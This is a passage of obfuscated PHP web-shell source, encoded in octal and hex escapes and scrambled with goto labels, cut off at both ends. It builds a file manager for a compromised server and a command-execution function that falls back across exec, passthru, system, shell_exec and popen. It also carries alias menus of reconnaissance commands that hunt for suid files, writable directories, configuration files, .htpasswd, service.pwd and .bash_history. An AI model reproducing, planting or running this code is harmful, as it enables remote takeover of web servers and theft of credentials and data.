"\74\x73\143\162\151\x70\164\x3e\12\11\146\165\156\x63\x74\x69\x6f\156\40\163\141\x28\51\40\173\12\x9\11\x66\157\162\x28\151\x3d\60\x3b\x69\x3c\144\56\146\151\154\145\163\56\145\154\145\155\x65\156\x74\163\56\154\145\156\x67\164\x68\73\x69\53\x2b\x29\12\x9\11\11\x69\146\50\x64\x2e\146\x69\154\x65\x73\56\145\154\x65\x6d\x65\156\164\x73\x5b\x69\x5d\56\x74\171\160\145\40\75\x3d\x20\47\x63\150\x65\143\153\x62\157\170\47\x29\xa\x9\11\11\11\x64\56\146\151\x6c\x65\163\x2e\145\154\x65\x6d\x65\156\x74\x73\x5b\151\135\x2e\143\x68\x65\143\153\145\x64\x20\75\x20\144\x2e\x66\151\154\x65\163\56\145\154\145\155\x65\x6e\164\x73\x5b\60\x5d\x2e\x63\x68\145\143\153\x65\144\73\12\11\175\12\74\x2f\163\x63\x72\x69\x70\x74\x3e\12\x3c\x74\141\142\x6c\x65\x20\x77\x69\x64\164\150\x3d\x27\61\x30\60\x25\47\x20\143\154\141\x73\163\75\x27\155\141\x69\x6e\x27\40\x63\x65\x6c\154\163\160\x61\143\x69\x6e\x67\75\x27\60\x27\x20\x63\145\x6c\x6c\160\141\144\144\151\156\x67\75\x27\x32\47\76\xa\x3c\x66\157\162\x6d\40\156\x61\155\145\75\146\151\x6c\x65\163\x20\x6d\x65\164\150\x6f\144\75\x70\157\163\164\76\74\164\162\x3e\x3c\x74\x68\40\x77\151\x64\164\150\75\x27\x31\x33\160\x78\47\x3e\74\x69\x6e\x70\x75\x74\40\x74\171\160\145\x3d\143\x68\x65\x63\153\142\157\x78\x20\157\x6e\143\x6c\151\x63\x6b\75\47\163\141\x28\x29\x27\x20\x63\154\141\163\163\x3d\x63\x68\x6b\x62\170\76\74\x2f\164\150\76\74\x74\x68\x3e\x3c\141\x20\150\162\x65\x66\x3d\x27\x23\x27\40\x6f\x6e\x63\x6c\x69\x63\x6b\x3d\47\147\x28\42\x46\151\x6c\x65\163\x4d\141\156\x22\54\x6e\165\154\154\x2c\x22\163\x5f\156\x61\155\x65\x5f" . ($sort[1] ? 0 : 1) . "\42\51\x27\x3e\x4e\141\155\145\x3c\57\141\x3e\x3c\57\164\x68\76\74\x74\x68\x3e\74\x61\40\x68\162\145\x66\75\x27\x23\x27\x20\157\156\143\x6c\151\143\153\x3d\47\147\50\42\x46\151\154\x65\x73\115\x61\156\42\54\x6e\165\x6c\154\x2c\42\163\137\163\x69\172\x65\x5f" . ($sort[1] ? 0 : 1) . "\42\x29\x27\x3e\x53\151\172\x65\74\x2f\x61\x3e\x3c\x2f\164\150\76\74\164\x68\x3e\x3c\x61\x20\150\x72\x65\146\x3d\x27\x23\47\40\157\156\143\x6c\x69\143\153\x3d\47\147\x28\x22\x46\x69\x6c\145\x73\x4d\141\156\42\54\156\165\x6c\154\54\x22\x73\x5f\x6d\x6f\x64\151\x66\x79\137" . ($sort[1] ? 0 : 1) . "\x22\x29\47\76\x4d\x6f\x64\151\146\171\x3c\57\x61\x3e\74\x2f\x74\x68\x3e\74\x74\150\76\117\167\156\x65\162\x2f\x47\162\x6f\165\x70\x3c\x2f\x74\150\x3e\74\164\x68\76\74\x61\40\150\x72\x65\146\x3d\x27\43\47\x20\157\x6e\143\154\x69\x63\x6b\75\47\x67\50\42\106\x69\154\145\x73\x4d\141\156\x22\54\x6e\x75\x6c\x6c\x2c\x22\163\137\160\145\162\x6d\x73\x5f" . ($sort[1] ? 0 : 1) . "\x22\x29\47\x3e\120\145\162\155\151\x73\x73\x69\157\x6e\x73\74\x2f\x61\x3e\74\57\x74\150\76\74\164\150\x3e\x41\143\164\x69\157\x6e\163\74\x2f\164\150\x3e\x3c\x2f\x74\162\76"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("\x6e\x61\155\x65" => $dirContent[$i], "\160\141\x74\x68" => $GLOBALS["\x63\x77\x64"] . $dirContent[$i], "\x6d\157\x64\151\x66\171" => date("\x59\55\x6d\x2d\144\40\x48\72\x69\72\x73", @filemtime($GLOBALS["\143\167\144"] . $dirContent[$i])), "\160\145\x72\x6d\163" => viewPermsColor($GLOBALS["\143\167\144"] . $dirContent[$i]), "\x73\x69\172\x65" => @filesize($GLOBALS["\143\167\144"] . $dirContent[$i]), "\x6f\167\x6e\x65\x72" => $ow["\156\141\x6d\x65"] ? $ow["\x6e\x61\155\x65"] : @fileowner($dirContent[$i]), "\x67\162\157\x75\160" => $gr["\x6e\141\155\145"] ? $gr["\156\141\x6d\145"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["\x63\x77\144"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("\164\x79\x70\x65" => "\146\x69\154\x65")); } elseif (@is_link($GLOBALS["\143\167\144"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\x74\171\160\145" => "\154\x69\x6e\x6b", "\x6c\151\x6e\153" => readlink($tmp["\160\x61\164\x68"]))); } elseif (@is_dir($GLOBALS["\x63\167\144"] . $dirContent[$i]) && $dirContent[$i] != "\x2e") { $dirs[] = array_merge($tmp, array("\x74\171\160\x65" => "\x64\151\162")); } } $GLOBALS["\163\157\162\164"] = $sort; function cmp($a, $b) { if ($GLOBALS["\163\157\162\164"][0] != "\163\x69\172\145") { return strcmp(strtolower($a[$GLOBALS["\x73\157\162\x74"][0]]), strtolower($b[$GLOBALS["\163\157\162\164"][0]])) * ($GLOBALS["\x73\x6f\162\164"][1] ? 1 : -1); } else { return ($a["\x73\x69\x7a\145"] < $b["\163\x69\x7a\145"] ? -1 : 1) * ($GLOBALS["\163\157\162\x74"][1] ? 1 : -1); } } usort($files, "\143\x6d\160"); usort($dirs, "\143\x6d\160"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "\74\x74\162" . ($l ? "\40\x63\154\141\x73\163\x3d\154\x31" : '') . "\x3e\x3c\164\144\76\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\x65\x3d\143\x68\x65\x63\x6b\x62\157\x78\x20\156\x61\155\145\75\x22\146\x5b\135\x22\x20\166\141\154\x75\x65\75\x22" . urlencode($f["\x6e\x61\x6d\145"]) . "\42\x20\x63\x6c\141\x73\x73\75\143\x68\x6b\142\x78\x3e\x3c\57\164\x64\76\74\164\x64\x3e\x3c\141\x20\x68\162\x65\146\x3d\43\x20\x6f\x6e\x63\154\x69\x63\153\x3d\x22" . ($f["\x74\x79\x70\145"] == "\146\151\x6c\145" ? "\x67\x28\x27\x46\151\154\x65\x73\124\x6f\157\154\x73\47\54\x6e\x75\x6c\154\54\47" . urlencode($f["\156\x61\x6d\145"]) . "\x27\x2c\x20\47\166\x69\x65\x77\47\x29\x22\x3e" . htmlspecialchars($f["\x6e\141\155\145"]) : "\147\x28\x27\106\x69\x6c\145\163\115\x61\x6e\47\x2c\x27" . $f["\x70\x61\164\150"] . "\47\51\x3b\x22\40" . (empty($f["\x6c\x69\x6e\153"]) ? '' : "\164\x69\x74\x6c\x65\x3d\47{$f["\154\x69\x6e\x6b"]}\47") . "\76\x3c\x62\76\x5b\x20" . htmlspecialchars($f["\x6e\x61\x6d\x65"]) . "\40\x5d\x3c\x2f\x62\x3e") . "\x3c\x2f\141\x3e\x3c\57\x74\x64\x3e\x3c\x74\144\76" . ($f["\164\171\160\x65"] == "\146\x69\154\x65" ? viewSize($f["\x73\x69\x7a\145"]) : $f["\x74\171\160\x65"]) . "\x3c\57\164\x64\x3e\x3c\164\144\76" . $f["\155\157\x64\x69\x66\171"] . "\74\x2f\164\x64\76\74\x74\144\x3e" . $f["\x6f\167\x6e\x65\162"] . "\57" . $f["\147\x72\157\165\x70"] . "\x3c\57\164\144\76\74\164\x64\76\74\x61\x20\150\x72\145\146\x3d\x23\x20\x6f\156\143\x6c\151\143\x6b\75\42\x67\50\x27\x46\x69\x6c\145\163\124\x6f\x6f\x6c\163\47\54\156\165\154\x6c\54\x27" . urlencode($f["\156\x61\x6d\145"]) . "\x27\54\47\143\150\155\x6f\144\x27\51\x22\x3e" . $f["\x70\x65\x72\x6d\163"] . "\74\x2f\x74\x64\76\74\164\144\76\74\x61\40\x63\154\141\163\163\x3d\x22\x74\157\157\154\164\151\x70\42\40\x64\141\x74\141\55\164\157\x6f\154\164\151\160\75\42\x52\x65\156\x61\155\145\x22\x20\150\x72\145\x66\75\x22\43\x22\40\x6f\x6e\143\154\x69\143\x6b\75\x22\147\50\x27\x46\151\154\145\163\124\x6f\x6f\154\163\x27\54\156\165\x6c\154\54\47" . urlencode($f["\x6e\141\x6d\145"]) . "\x27\x2c\40\x27\162\145\156\141\155\145\47\x29\42\x3e\x52\74\x2f\x61\76\x20\74\141\x20\x63\x6c\141\x73\x73\x3d\42\x74\157\157\154\x74\x69\x70\x22\40\144\x61\164\x61\55\x74\x6f\157\154\164\x69\x70\x3d\42\124\x6f\x75\x63\x68\42\40\150\x72\x65\146\x3d\x22\43\42\x20\157\156\143\x6c\151\x63\x6b\75\x22\147\50\47\106\151\x6c\x65\163\124\x6f\157\x6c\163\x27\x2c\156\165\154\x6c\x2c\x27" . urlencode($f["\156\x61\x6d\x65"]) . "\47\x2c\x20\47\x74\x6f\165\143\150\47\x29\42\x3e\124\74\57\141\x3e" . ($f["\164\171\x70\145"] == "\146\x69\154\145" ? "\40\74\141\40\143\x6c\141\163\x73\75\42\x74\x6f\157\154\164\151\x70\x22\40\144\141\164\141\55\164\157\x6f\154\x74\151\160\x3d\42\x46\162\x61\x6d\x65\42\40\150\162\x65\x66\x3d\x22\x23\x22\40\157\156\x63\x6c\x69\143\x6b\x3d\x22\x67\x28\x27\x46\x69\x6c\145\163\x54\157\x6f\154\x73\47\x2c\x6e\x75\x6c\x6c\x2c\x27" . urlencode($f["\x6e\141\x6d\145"]) . "\47\54\40\47\146\162\x61\x6d\x65\47\x29\42\76\106\x3c\x2f\141\x3e\x20\74\x61\x20\x63\x6c\141\x73\x73\75\42\164\157\x6f\x6c\x74\151\x70\x22\x20\x64\x61\x74\x61\55\164\157\157\x6c\164\151\160\75\x22\x45\x64\151\x74\x22\40\150\x72\x65\x66\x3d\42\43\x22\x20\157\156\x63\x6c\x69\x63\x6b\x3d\x22\x67\x28\x27\106\x69\154\x65\163\124\157\x6f\x6c\x73\x27\54\x6e\x75\x6c\154\54\47" . urlencode($f["\156\141\155\x65"]) . "\x27\54\40\47\145\x64\151\x74\47\x29\42\x3e\x45\x3c\57\x61\x3e\40\x3c\141\x20\x63\154\141\x73\x73\75\x22\x74\x6f\x6f\x6c\164\x69\160\42\40\x64\141\x74\x61\x2d\x74\x6f\157\x6c\x74\151\160\75\x22\104\x6f\x77\156\x6c\157\x61\x64\x22\x20\150\162\145\146\75\42\x23\x22\40\157\156\143\154\151\143\x6b\x3d\x22\147\x28\47\106\x69\x6c\145\163\124\157\x6f\x6c\x73\x27\x2c\156\165\x6c\x6c\x2c\x27" . urlencode($f["\x6e\x61\x6d\x65"]) . "\x27\x2c\40\47\144\x6f\x77\x6e\x6c\x6f\x61\144\47\x29\x22\76\x44\x3c\x2f\x61\76" : '') . "\x3c\57\x74\x64\x3e\74\x2f\x74\162\x3e"; $l = $l ? 0 : 1; } echo "\x3c\164\x72\40\151\144\x3d\146\x61\153\76\x3c\164\x64\x20\143\x6f\154\x73\x70\x61\x6e\x3d\x37\76\xa\x9\74\151\156\160\165\x74\40\164\171\160\x65\x3d\150\x69\144\144\145\156\x20\x6e\x61\155\145\x3d\x6e\145\x20\166\141\154\x75\145\75\47\x27\x3e\12\11\74\151\156\x70\x75\164\x20\x74\x79\160\x65\x3d\x68\151\x64\x64\145\156\40\x6e\x61\x6d\x65\x3d\x61\x20\166\x61\154\165\145\75\x27\106\151\154\145\x73\x4d\x61\156\x27\76\xa\11\x3c\151\156\x70\x75\x74\x20\x74\x79\x70\145\x3d\x68\x69\144\x64\145\156\40\156\x61\155\145\75\143\x20\x76\x61\x6c\165\x65\75\47" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\47\x3e\12\11\74\151\156\160\165\x74\x20\164\x79\160\145\x3d\150\151\144\x64\145\156\40\x6e\x61\x6d\145\75\x63\150\141\x72\163\x65\164\40\166\x61\x6c\x75\x65\x3d\47" . (isset($_POST["\143\150\141\x72\163\145\164"]) ? $_POST["\143\x68\x61\x72\x73\x65\164"] : '') . "\x27\x3e\xa\x9\74\154\x61\142\x65\x6c\76\x3c\163\145\x6c\x65\143\164\40\x6e\141\155\x65\75\x27\160\61\x27\x3e"; if (!empty($_COOKIE["\x61\143\164"]) && @count($_COOKIE["\x66"])) { echo "\74\x6f\160\164\x69\157\156\40\x76\141\x6c\165\145\75\x27\x70\x61\163\164\x65\x27\76\342\206\xb3\x20\x50\x61\163\164\145\74\x2f\x6f\160\164\151\x6f\156\76"; } echo "\74\x6f\x70\164\151\157\x6e\40\x76\x61\154\165\145\75\47\143\157\160\x79\47\x3e\103\157\x70\x79\x3c\x2f\157\x70\x74\x69\157\x6e\x3e\74\x6f\x70\x74\x69\x6f\156\40\x76\x61\x6c\x75\145\75\47\155\x6f\166\x65\x27\76\x4d\157\x76\145\74\x2f\x6f\160\164\x69\157\156\76\x3c\x6f\160\164\151\157\156\40\x76\x61\x6c\x75\145\75\47\144\145\x6c\145\x74\145\47\76\x44\x65\154\x65\164\145\x3c\57\157\x70\164\151\x6f\156\76"; if (class_exists("\x5a\151\160\x41\x72\x63\x68\x69\166\145")) { echo "\x3c\x6f\160\x74\x69\x6f\x6e\40\x76\141\x6c\x75\x65\75\x27\x7a\151\x70\x27\x3e\53\40\172\x69\160\74\x2f\157\160\x74\x69\x6f\156\x3e\74\x6f\160\x74\x69\157\x6e\x20\x76\x61\x6c\165\145\75\x27\x75\x6e\172\151\x70\x27\x3e\x2d\x20\172\x69\x70\74\57\x6f\x70\x74\151\x6f\x6e\76"; } echo "\x3c\x6f\160\164\151\157\156\x20\x76\x61\154\165\145\75\x27\164\x61\162\x27\76\53\40\x74\141\x72\x2e\147\172\74\57\x6f\160\164\x69\x6f\x6e\76"; echo "\74\x2f\163\145\x6c\x65\x63\x74\x3e\74\57\154\141\x62\x65\154\x3e"; if (!empty($_COOKIE["\x61\x63\x74"]) && @count($_COOKIE["\146"]) && ($_COOKIE["\x61\x63\164"] == "\x7a\x69\160" || $_COOKIE["\141\143\x74"] == "\x74\x61\162")) { echo "\x26\156\142\163\160\x3b\146\x69\154\145\x20\156\141\x6d\x65\x3a\x20\x3c\151\x6e\160\x75\164\40\164\171\160\145\x3d\x74\x65\170\x74\x20\x6e\x61\x6d\x65\x3d\x70\62\x20\166\x61\x6c\165\145\75\x27\150\141\x72\x64\x5f" . date("\131\155\144\x5f\x48\151\163") . "\56" . ($_COOKIE["\x61\143\164"] == "\x7a\151\160" ? "\172\151\x70" : "\x74\x61\162\x2e\147\172") . "\x27\x3e\46\156\x62\163\x70\73"; } echo "\x3c\151\156\x70\x75\164\40\x74\171\x70\x65\x3d\47\163\165\x62\155\151\164\47\40\166\141\x6c\x75\145\x3d\47\163\165\142\155\x69\164\47\76\x3c\x2f\164\x64\x3e\x3c\x2f\x74\162\x3e\x3c\x2f\x66\157\x72\x6d\x3e\x3c\x2f\x74\x61\x62\154\x65\76\74\x2f\x64\151\x76\x3e"; hardFooter(); } goto Bpag2; rc2dt: function ex($in) { $ = ''; if (function_exists("\145\170\145\x63")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("\x70\x61\x73\163\164\150\x72\x75")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("\163\x79\x73\164\145\x6d")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("\163\150\x65\x6c\154\137\x65\x78\x65\143")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "\162"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\342\x86\xb3\40\125\x6e\141\142\154\x65\x20\164\157\40\145\170\x65\x63\165\x74\x65\x20\143\157\155\155\141\156\x64\xa"; } return $ == '' ? "\342\206\263\40\x51\x75\145\162\171\x20\144\151\x64\40\156\x6f\164\40\162\x65\164\165\162\x6e\x20\x61\x6e\x79\x74\150\151\x6e\147\12" : $; } goto YQzoR; r2c06: @ini_set("\x6c\x6f\x67\x5f\145\x72\162\157\162\163", 0); goto dPBlO; XGk3X: if ($os == "\167\151\x6e") { $aliases = array("\x4c\151\163\164\x20\104\151\162\145\143\x74\x6f\x72\171" => "\x64\151\x72", "\106\151\x6e\144\40\x69\156\x64\x65\170\56\x70\x68\160\x20\x69\x6e\40\x63\165\162\x72\145\156\164\x20\x64\x69\162" => "\x64\x69\162\40\x2f\x73\40\x2f\167\40\x2f\x62\x20\x69\156\x64\x65\x78\56\x70\x68\160", "\106\151\x6e\144\x20\x2a\x63\x6f\x6e\x66\x69\x67\52\x2e\160\x68\x70\40\151\x6e\40\x63\x75\162\162\145\x6e\164\40\144\151\x72" => "\x64\x69\162\40\57\x73\x20\x2f\167\40\x2f\x62\40\52\143\x6f\156\146\151\x67\x2a\x2e\160\x68\160", "\123\150\x6f\x77\x20\141\x63\x74\x69\166\x65\x20\143\157\156\x6e\145\143\x74\151\x6f\x6e\163" => "\156\145\164\x73\x74\141\164\x20\x2d\141\x6e", "\x53\150\x6f\167\x20\x72\165\156\156\x69\x6e\147\x20\x73\145\162\x76\x69\x63\x65\163" => "\156\145\164\40\163\164\141\162\x74", "\x55\x73\x65\162\x20\141\143\143\x6f\x75\x6e\164\x73" => "\x6e\x65\x74\x20\165\x73\x65\x72", "\x53\x68\157\167\40\x63\x6f\155\x70\165\164\145\162\x73" => "\x6e\145\x74\x20\x76\x69\x65\167", "\101\122\120\x20\124\x61\x62\x6c\x65" => "\141\162\160\40\55\141", "\x49\x50\x20\x43\157\x6e\146\x69\x67\x75\x72\141\x74\151\157\x6e" => "\x69\160\x63\x6f\x6e\146\151\147\x20\x2f\141\154\154"); } else { $aliases = array("\114\x69\163\164\40\144\x69\x72" => "\x6c\163\x20\55\x6c\150\141", "\x6c\151\163\164\x20\x66\x69\154\x65\40\x61\x74\164\162\151\142\165\x74\x65\x73\40\157\156\40\x61\40\x4c\151\156\165\x78\40\163\x65\143\x6f\156\x64\x20\145\170\164\145\x6e\144\x65\x64\x20\146\151\x6c\x65\x20\163\x79\x73\164\x65\155" => "\x6c\x73\x61\x74\164\x72\40\x2d\x76\x61", "\163\x68\157\167\40\x6f\x70\x65\x6e\145\144\x20\160\157\162\x74\163" => "\x6e\x65\164\163\x74\141\x74\40\x2d\x61\x6e\x20\174\x20\x67\x72\145\x70\x20\x2d\x69\x20\154\x69\x73\x74\x65\x6e", "\x70\x72\x6f\143\x65\x73\x73\40\163\164\x61\x74\165\163" => "\x70\x73\40\141\165\170", "\106\151\x6e\144" => '', "\x66\x69\156\x64\40\x61\154\x6c\40\163\x75\x69\144\40\146\151\154\x65\x73" => "\x66\x69\x6e\x64\40\x2f\x20\x2d\164\x79\x70\x65\40\x66\40\x2d\160\145\x72\155\x20\x2d\x30\x34\60\x30\60\x20\55\154\163", "\146\x69\x6e\144\x20\x73\165\151\x64\x20\146\x69\x6c\145\163\40\x69\x6e\x20\143\165\162\162\145\156\164\x20\x64\x69\x72" => "\x66\151\156\x64\40\56\40\55\x74\x79\160\x65\x20\146\x20\x2d\160\x65\162\155\40\55\60\64\x30\x30\60\x20\55\154\163", "\146\151\x6e\144\x20\141\154\154\40\163\x67\151\x64\x20\146\151\x6c\145\x73" => "\146\151\x6e\144\40\57\40\x2d\x74\171\x70\x65\40\146\x20\x2d\x70\x65\x72\x6d\x20\55\60\62\x30\60\60\x20\x2d\x6c\x73", "\x66\151\156\144\x20\x73\147\151\144\x20\x66\151\154\145\163\40\151\156\x20\143\x75\162\x72\x65\x6e\x74\40\x64\151\162" => "\146\x69\156\144\40\56\40\x2d\164\x79\160\x65\x20\x66\40\55\160\145\x72\x6d\40\x2d\60\62\x30\60\60\x20\55\x6c\163", "\x66\151\156\x64\40\143\x6f\x6e\146\x69\147\56\x69\156\x63\56\160\150\160\40\x66\151\x6c\x65\163" => "\x66\x69\156\x64\x20\57\x20\x2d\164\171\x70\x65\x20\146\x20\55\156\x61\x6d\145\x20\x63\157\x6e\x66\151\147\56\x69\156\143\56\160\x68\160", "\x66\x69\156\144\40\x63\x6f\x6e\x66\151\147\x2a\40\146\x69\x6c\145\x73" => "\146\x69\156\x64\x20\57\x20\x2d\164\x79\160\145\x20\146\x20\55\156\x61\x6d\145\40\x22\x63\x6f\x6e\146\x69\x67\52\x22", "\x66\151\156\x64\x20\x63\157\156\146\x69\147\52\40\x66\x69\154\x65\163\x20\x69\x6e\40\x63\165\162\x72\x65\x6e\x74\x20\144\x69\162" => "\x66\151\x6e\x64\x20\56\40\x2d\164\x79\160\145\40\146\40\x2d\156\141\x6d\145\40\x22\143\x6f\x6e\146\151\x67\x2a\42", "\146\151\156\x64\x20\x61\x6c\x6c\40\167\x72\151\164\x61\142\x6c\145\x20\x66\x6f\154\x64\145\162\x73\x20\141\x6e\x64\x20\x66\151\x6c\x65\x73" => "\146\x69\156\144\x20\x2f\x20\55\x70\145\162\x6d\40\55\x32\40\55\154\163", "\146\x69\x6e\x64\40\x61\x6c\154\x20\167\x72\x69\164\x61\x62\154\x65\x20\x66\x6f\154\x64\x65\162\163\x20\141\156\144\x20\x66\151\154\145\x73\x20\x69\x6e\x20\143\x75\x72\x72\145\x6e\164\x20\x64\151\x72" => "\146\151\x6e\144\40\56\40\x2d\x70\x65\x72\155\40\x2d\62\x20\55\154\163", "\146\151\x6e\144\40\x61\x6c\154\40\163\x65\x72\166\151\143\145\56\x70\x77\144\40\x66\x69\154\145\163" => "\x66\x69\156\x64\40\57\x20\55\x74\171\x70\x65\x20\x66\x20\55\156\x61\x6d\x65\40\x73\145\x72\x76\151\x63\145\x2e\160\167\144", "\146\151\156\144\x20\x73\145\162\166\x69\x63\x65\x2e\160\x77\144\40\x66\x69\x6c\145\163\40\151\156\40\143\165\x72\x72\145\156\x74\40\144\x69\x72" => "\x66\x69\156\144\x20\56\x20\x2d\164\x79\160\x65\x20\146\x20\55\156\141\155\x65\40\163\145\x72\x76\x69\x63\145\56\160\167\144", "\x66\x69\156\x64\x20\141\154\x6c\x20\56\150\x74\160\x61\163\x73\167\144\x20\146\151\154\145\x73" => "\146\x69\x6e\144\x20\57\40\55\x74\171\160\145\40\x66\40\55\x6e\x61\155\145\40\56\x68\x74\x70\141\x73\163\x77\x64", "\x66\x69\156\x64\x20\56\x68\164\x70\x61\163\x73\167\x64\40\x66\151\154\x65\163\40\x69\x6e\40\x63\165\x72\162\145\x6e\164\40\144\x69\x72" => "\x66\151\x6e\144\40\x2e\x20\x2d\x74\x79\160\145\x20\x66\x20\x2d\x6e\x61\155\x65\40\56\x68\x74\x70\141\x73\x73\167\144", "\146\151\x6e\144\x20\141\x6c\x6c\x20\x2e\x62\141\163\150\137\x68\151\x73\164\x6f\162\x79\40\146\x69\154\x65\x73" => "\x66\x69\156\144\x20\x2f\40\x2d\x74\x79\x70\x65\40\x66\x20\x2d\156\141\x6d\x65\40\56\142\141\x73\150\137\150\x69\163\164\x6f\162\x79", "\146\151\x6e\x64\40\56\x62\x61\x73\150\x5f\150\151\163\x74\157\x72\x79\40\146\x69\x6c\x65\x73\40\151\x6e\x20\x63\x75\162\162\145\x6e\164\x20\x64\151\162" => "\146\x69\156\x64\x20\x2e\40\x2d\x74\171\160\x65\40\x66\40\x2d\x6e\141\x6d\x65\x20\56\x62\141\x73\150\137\x68\x69\163\x74\157\x72\x79", "\146\x69\x6e\144\x20\x61\154\x6c\x20\56\x66\145\x74\x63\150\x6d\141\x69\x6c\x72\x63\40\x66\151\x6c\145\163" => "\x66\x69\156\x64\x20\x2f\x20\x2d\164\x79\x70\x65\40\x66\40\x2d\x6e\141\x6d\x65\x20\x2e\146\x65\164\x63\x68\x6d\141\151\x6c\x72\x63", "\146\151\156\144\40\56\146\145\x74\x63\x68\x6d\141\151\154\162\143\x20\146\151\154\x65\x73\40\151\x6e\40\143\165\162\x72\x65\156\164\x20\144\151\x72" => "\146\x69\156\144\x20\56\x20\x2d\164\171\160\x65\x20\x66\40\55\x6e\x61\155\145\x20\x2e\146\145\x74\x63\150\x6d\141\151\x6c\x72\143", "\114\157\x63\x61\x74\x65" => '', "\x6c\157\143\141\164\x65\x20\150\x74\164\x70\144\56\143\157\156\146\x20\x66\151\x6c\x65\x73" => "\154\x6f\143\141\x74\145\40\150\x74\x74\x70\x64\56\x63\x6f\156\146", "\154\157\143\141\x74\145\x20\166\x68\x6f\x73\164\x73\x2e\x63\157\156\146\40\x66\x69\x6c\145\x73" => "\154\x6f\143\141\x74\145\40\166\x68\157\163\164\x73\56\143\x6f\156\x66", "\x6c\157\x63\x61\164\x65\x20\160\x72\x6f\146\x74\160\x64\56\x63\157\x6e\146\40\146\x69\154\145\163" => "\x6c\x6f\x63\141\x74\x65\40\160\162\157\146\164\x70\144\56\143\157\156\x66", "\x6c\x6f\143\x61\x74\x65\40\160\x73\x79\x62\x6e\143\56\x63\x6f\x6e\x66\40\x66\151\x6c\x65\x73" => "\x6c\157\x63\141\x74\x65\x20\x70\163\171\x62\156\x63\x2e\143\157\x6e\146", "\x6c\x6f\x63\x61\164\145\x20\x6d\171\56\143\x6f\156\146\40\146\x69\154\x65\163" => "\x6c\157\x63\141\x74\145\x20\x6d\171\56\x63\157\x6e\146", "\x6c\157\x63\x61\x74\x65\40\141\144\155\151\156\56\160\x68\160\x20\146\151\x6c\x65\163" => "\154\157\x63\x61\164\x65\x20\141\144\155\x69\156\x2e\160\x68\160", "\x6c\x6f\x63\141\164\x65\x20\143\146\147\56\160\150\160\x20\x66\151\x6c\145\163" => "\154\x6f\x63\141\164\x65\40\x63\146\147\56\x70\150\160", "\154\x6f\143\141\164\x65\x20\143\157\156\x66\x2e\160\150\160\40\x66\151\154\145\163" => "\x6c\x6f\x63\x61\164\145\40\x63\x6f\x6e\146\x2e\160\150\160", "\x6c\x6f\x63\141\164\145\x20\x63\157\x6e\146\x69\x67\56\144\141\164\x20\146\151\x6c\x65\163" => "\x6c\x6f\143\141\164\145\x20\143\x6f\156\146\151\x67\x2e\144\141\x74", "\154\x6f\143\x61\x74\145\x20\x63\x6f\x6e\x66\151\147\56\160\x68\160\x20\146\x69\154\145\x73" => "\x6c\x6f\143\141\164\145\40\143\x6f\x6e\146\x69\147\56\160\x68\160", "\154\x6f\143\141\164\145\40\143\x6f\156\x66\151\x67\56\x69\156\143\40\x66\x69\154\145\x73" => "\x6c\157\143\x61\x74\145\x20\143\x6f\x6e\x66\151\x67\x2e\x69\156\x63", "\154\157\143\141\164\x65\40\x63\x6f\156\146\151\147\56\x69\156\x63\56\160\x68\x70" => "\x6c\157\143\x61\164\x65\x20\143\x6f\156\x66\151\x67\x2e\x69\156\x63\56\160\150\x70", "\154\157\x63\x61\164\145\40\143\x6f\x6e\x66\x69\x67\x2e\144\x65\146\x61\165\154\164\x2e\x70\150\x70\x20\146\x69\154\145\163" => "\x6c\157\143\x61\164\145\x20\x63\x6f\x6e\x66\151\x67\x2e\144\x65\x66\x61\165\x6c\x74\x2e\160\x68\160", "\154\x6f\x63\141\x74\145\40\143\x6f\x6e\146\x69\147\x2a\x20\146\151\x6c\x65\x73\x20" => "\x6c\x6f\x63\141\x74\x65\x20\x63\x6f\156\146\151\x67", "\x6c\x6f\x63\x61\164\145\40\56\x63\157\x6e\x66\x20\146\x69\x6c\x65\163" => "\154\x6f\143\x61\x74\x65\40\47\56\x63\157\156\x66\47", "\x6c\x6f\143\x61\164\x65\x20\56\160\167\x64\x20\x66\x69\x6c\145\x73" => "\154\x6f\x63\x61\x74\x65\x20\47\x2e\x70\167\x64\47", "\154\157\x63\141\x74\145\x20\56\163\x71\x6c\x20\146\x69\x6c\145\163" => "\154\157\143\141\164\145\40\47\56\x73\161\x6c\47", "\x6c\x6f\143\141\164\x65\40\x2e\150\164\x70\141\163\163\x77\144\40\x66\x69\x6c\x65\x73" => "\x6c\157\143\x61\x74\x65\40\47\x2e\150\x74\x70\x61\x73\163\x77\144\x27", "\x6c\x6f\143\141\164\145\x20\56\142\141\x73\150\137\x68\x69\x73\x74\x6f\x72\171\x20\x66\x69\x6c\145\163" => "\154\x6f\143\x61\164\145\40\x27\x2e\142\141\163\x68\137\x68\x69\x73\x74\157\162\x79\x27", "\x6c\157\x63\x61\x74\x65\x20\x2e\155\171\x73\x71\154\x5f\x68\151\163\164\x6f\x72\171\x20\x66\x69\154\x65\163" => "\x6c\157\x63\x61\x74\145\x20\47\x2e\155\x79\x73\x71\154\x5f\x68\x69\x73\164\157\162\171\47", "\x6c\x6f\x63\x61\x74\145\40\x2e\x66\145\x74\x63\150\155\141\x69\154\x72\143\x20\146\x69\154\x65\163" => "\154\157\x63\141\x74\x65\x20\x27\x2e\146\145\x74\143\150\155\x61\x69\154\162\x63\47", "\154\x6f\x63\x61\x74\x65\40\142\141\143\153\x75\160\x20\146\151\154\145\163" => "\x6c\x6f\143\141\x74\145\x20\142\141\143\153\165\160", "\154\157\143\x61\x74\x65\x20\x64\x75\x6d\x70\x20\x66\151\154\145\x73" => "\154\x6f\x63\x61\x74\145\40\144\165\155\160", "\x6c\x6f\143\x61\164\x65\x20\160\162\x69\x76\40\x66\151\x6c\x65\x73" => "\x6c\157\143\x61\x74\145\x20\160\x72\x69\x76"); } goto Y2Zvy; TA8hx: $ = "\125\x54\106\x2d\70"; goto TQhs6; fqre7: if ($os == "\x77\151\x6e") { $home_cwd = str_replace("\134", "\57", 